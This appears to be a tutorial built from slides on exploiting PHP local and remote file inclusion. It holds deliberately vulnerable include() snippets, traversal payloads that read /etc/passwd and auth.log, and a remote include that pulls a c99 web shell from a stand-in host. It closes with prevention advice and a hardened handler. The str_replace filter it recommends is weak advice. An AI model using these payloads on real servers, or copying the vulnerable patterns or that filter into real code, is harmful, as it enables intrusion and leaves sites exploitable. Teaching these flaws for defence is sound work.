This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
6. #Local File Inclusion
Local File Inclusion is the process of including files on
a server through the web browser. The vulnerability
occurs when the file name passed to a page include is not properly
sanitized, so directory traversal characters can be injected.
<?php
$page = $_GET["page"];
include($page); // Vulnerable !! -- the user-controlled value goes straight into include()
?>
7. #Local File Inclusion
What if the attacker sets page to
"../../../../etc/passwd"? The include then reads the
contents of /etc/passwd for the attacker.
Vulnerable functions that lead to LFI:
-include()
-include_once()
-require()
-require_once()
-fopen()
9. #Local File Inclusion
<?php
if($_GET["page"]) {
$file = $_GET["page"];
// As written (no backslash) this pattern matches the literal text "x00",
// not a null byte, so a real %00 in the request survives the filter.
$file = preg_replace('/x00.*/', "", $file);
include($file);
}
?>
- In this case a null-byte terminator (%00) can be used to trigger the LFI
Eg: ?page=../../../../../../../../var/log/auth.log%00
11. #Remote File Inclusion
RFI stands for Remote File Inclusion, a vulnerability that allows the
attacker to get a custom coded/malicious file included on a website or
server. It exploits poor validation checks in websites and
can eventually lead to code execution on the server, or to code execution
in the website's pages (an XSS attack using JavaScript).
<?php
$file = "http://Somesite/c99.php?"; // what an attacker would pass as $_GET['page']
include($file . ".php"); // includes http://Somesite/c99.php?.php -- the appended ".php"
                         // lands in the query string, so the remote script is fetched as-is
?>
12. #Prevention
Do not permit appending file paths directly.
Use str_replace('../', '', $_GET['file']);
If you definitely need dynamic path concatenation,
ensure you only accept required characters such as "a-Z
0-9" and do not allow "..", "/", "%00" (null byte) or
any other similar unexpected characters.
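The slide-6 include and this prevention slide, taken together, as an added example that is not part of the original slides: a page-include handler that applies the character allowlist above, an exact-match list of known pages, and a realpath containment check. ALLOWED_PAGES, PAGE_DIR and the pages/ layout are assumptions; run on the CLI it reports which of the earlier slides' payloads are rejected.

```php
<?php
// Added example, not from the original slides: the slide-6 include handler
// rewritten along the lines of the prevention slide. ALLOWED_PAGES, PAGE_DIR
// and the pages/<name>.php layout are assumptions.

// Pages the application actually ships; nothing else is includable.
const ALLOWED_PAGES = ['home', 'about', 'contact'];
// Directory holding the includable templates (assumed layout).
const PAGE_DIR = __DIR__ . '/pages';

// Check 1 (character allowlist from the slide) and check 2 (exact-match allowlist).
// "../", "/", "%00" and "http://..." never pass, so they never reach include().
function page_name_is_valid(string $requested): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested) === 1
        && in_array($requested, ALLOWED_PAGES, true);
}

// Check 3 (defence in depth): resolve the real path and confirm it is still
// inside PAGE_DIR before handing it to include().
function resolve_page(string $requested): ?string
{
    if (!page_name_is_valid($requested)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed probes: the payloads from the earlier slides plus one legitimate name.
    $probes = ['home', '../../../../etc/passwd', "../../var/log/auth.log\0",
               'http://Somesite/c99.php?', 'home/../../etc/passwd'];
    foreach ($probes as $probe) {
        printf("%-32s => %s\n", addcslashes($probe, "\0"),
               page_name_is_valid($probe) ? 'accepted' : 'rejected');
    }
} else {
    $target = resolve_page($_GET['page'] ?? 'home');
    if ($target === null) {
        http_response_code(400);
        exit('Unknown page');
    }
    include $target;
}
```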